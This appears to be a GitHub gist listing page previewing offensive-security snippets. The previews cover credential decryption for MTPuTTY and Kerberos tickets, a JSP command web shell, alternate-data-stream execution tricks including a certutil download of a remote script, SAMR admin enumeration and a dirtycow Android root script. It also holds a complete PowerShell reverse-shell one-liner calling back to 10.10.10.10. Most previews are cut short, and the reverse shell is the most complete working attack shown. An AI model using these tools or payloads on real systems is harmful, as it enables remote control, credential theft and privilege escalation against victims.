Skip to content

Instantly share code, notes, and snippets.

View tothi's full-sized avatar
:shipit:

tothi

:shipit:
602 followers · 159 following
View GitHub Profile
@NotMedic
NotMedic / Instructions.md
Created November 7, 2019 20:10
Headless Remote Chrome Debugging - Ichabod Chrome :)

Target

Start Chrome with the following flags:

"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"

--remote-debugging-port=9222

--remote-debugging-address=0.0.0.0

@ykoster
ykoster / Invoke-MTPuTTYConfigDump.psm1
Last active March 6, 2026 02:33
Invoke-MTPuTTYConfigDump - read an MTPuTTY configuration file, decrypt the passwords and dump the result
<#
.Synopsis
Decrypt an MTPuTTY configuration file
.Description
Read an MTPuTTY configuration file, decrypt the passwords and dump the result
.Parameter ConfigFile
Path to the MTPuTTY configuration file
@xan7r
xan7r / decryptKerbTicket.py
Last active December 29, 2025 20:21
Decrypt kerberos tickets and parse out authorization data
#!/usr/bin/env python2
# NOTE: this script was created for educational purposes to assist learning about kerberos tickets.
# Likely to have a few bugs that cause it to fail to decrypt some TGT or Service tickets.
#
# Recommended Instructions:
# Obtain valid kerberos tickets using Rubeus or mimikatz "sekurlsa::tickets /export"
# Optionally convert tickets to ccache format using kekeo "misc::convert ccache <ticketName.kirbi>"
# Obtain appropriate aes256 key using dcsync (krbtgt for TGT or usually target computer account for Service Ticket)
# Run this script to decrypt:
# ./decryptKerbTicket.py -k 5c7ee0b8f0ffeedbeefdeadbeeff1eefc7d313620feedbeefdeadbeefafd601e -t ./Administrator@TESTLAB.LOCAL_krbtgt~TESTLAB.LOCAL@TESTLAB.LOCAL.ccaches
@Mr-Un1k0d3r
Mr-Un1k0d3r / poc.iqy
Created August 1, 2018 18:59
IQY File + Embedded DLL POC
WEB
1
https://ringzer0team.com/IQY
Selection=EntirePage
Formatting=RTF
PreFormattedTextToColumns=True
ConsecutiveDelimitersAsOne=True
SingleBlockTextImport=False
DisableDateRecognition=False
@nikallass
nikallass / file-browser.jsp
Last active April 18, 2023 04:32
File browser + cmd JSP shell (win+linux without modification)
<%--
jsp File browser 1.2.1
nikallass added OS check, so shell can be executed on Windows and Linux without modifying now.
Copyright (C) 2003-2006 Boris von Loesch
This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the
Free Software Foundation; either version 2 of the License, or (at your option)
any later version.
@egre55
egre55 / powershell_reverse_shell.ps1
Last active April 3, 2026 15:28
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
@api0cradle
api0cradle / Exe_ADS_Methods.md
Last active March 25, 2026 20:08
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

@ropnop
ropnop / lookupadmins.py
Last active February 10, 2025 16:53
Python script using Impacket to enumerate local administrators over SAMR
#!/usr/bin/env python
#
# Title: lookupadmins.py
# Author: @ropnop
# Description: Python script using Impacket to query members of the builtin Administrators group through SAMR
# Similar in function to Get-NetLocalGroup from Powerview
# Won't work against Windows 10 Anniversary Edition unless you already have local admin
# See: http://www.securityweek.com/microsoft-experts-launch-anti-recon-tool-windows-10-server-2016
#
# Heavily based on original Impacket example scripts written by @agsolino and available here: https://github.com/CoreSecurity/impacket
@mosquito
mosquito / README.md
Last active February 19, 2026 04:21
Add doker-compose as a systemd unit

Docker compose as a systemd unit

Create file /etc/systemd/system/docker-compose@.service. SystemD calling binaries using an absolute path. In my case is prefixed by /usr/local/bin, you should use paths specific for your environment.

[Unit]
Description=%i service with docker compose
PartOf=docker.service
After=docker.service
@Arinerron
Arinerron / root.sh
Last active March 7, 2026 01:47
"Root" via dirtyc0w privilege escalation exploit (automation script) / Android (32 bit)
#!/bin/bash
# Give the usual warning.
clear;
echo "[INFO] Automated Android root script started.\n\n[WARN] Exploit requires sdk module \"NDK\".\nFor more information, visit the installation guide @ https://goo.gl/E2nmLF\n[INFO] Press Ctrl+C to stop the script if you need to install the NDK module. Waiting 10 seconds...";
sleep 10;
clear;
# Download and extract exploit files.
echo "[INFO] Downloading exploit files from GitHub...";